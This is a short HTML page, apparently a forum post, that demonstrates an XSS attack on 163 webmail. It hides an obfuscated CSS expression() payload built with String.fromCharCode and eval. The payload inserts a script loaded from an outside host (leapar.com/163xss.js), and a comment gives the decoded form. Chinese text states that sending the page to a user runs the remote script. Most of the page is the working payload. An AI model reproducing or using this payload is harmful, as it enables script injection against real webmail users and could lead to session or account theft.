<html>
<style>
body {
width:
expression(eval(String.fromCharCode(0x69,0x66,0x28,0x21,0x77,0x69,0x6e,
0x64,0x6f,0x77,0x2e,0x78,0x78,0x78,0x29,0x7b,0x77,
0x69,0x6e,0x64,0x6f,0x77,0x2e,0x78,0x78,0x78,0x3d,0x31,0x3b,
0x69,0x66,0x28,0x64,0x6f,
0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x62,0x6f,0x64,0x79,0x29,0x7b,
0x76,0x61,0x72,0x20,0x73,
0x3d,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,
0x63,0x72,0x65,0x61,0x74,0x65,0x45,0x6c,
0x65,0x6d,0x65,0x6e,
0x74,0x28,0x22,0x73,0x63,0x72,0x69,0x70,0x74,0x22,0x29,0x3b,0x64,0x6f,
0x63,
0x75,0x6d,0x65,0x6e,0x74,0x2e,0x62,0x6f,0x64,0x79,0x2e,
0x61,0x70,0x70,0x65,0x6e,0x64,0x43,0x68,0x69,
0x6c,0x64,0x28,0x73,0x29,0x3b,0x73,0x2e,0x73,0x72,0x63,0x3d,
0x22,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x77,
0x77,0x77,0x2e,0x6c,0x65,0x61,0x70,0x61,0x72,0x2e,0x63,0x6f,0x6d,0x2f,
0x31,0x36,0x33,0x78,0x73,0x73,0x2e,
0x6a,0x73,0x22,0x3b,0x7d,0x7d)));
/*if(!window.xxx){window.xxx=1;if(document.body){var
s=document.createElement("script");document.body.appendChild(s);s.src="http://
www.leapar.com/163xss.js";}}*/
}
</style>
<body>
leapar..
163 expression xss..
</body>
</html>
把这个发送给
用户,将执行
http://www.leapar.com/163xss.js.
Powered by IXPUB.Net © 2001-2007 All Right Reserved. 
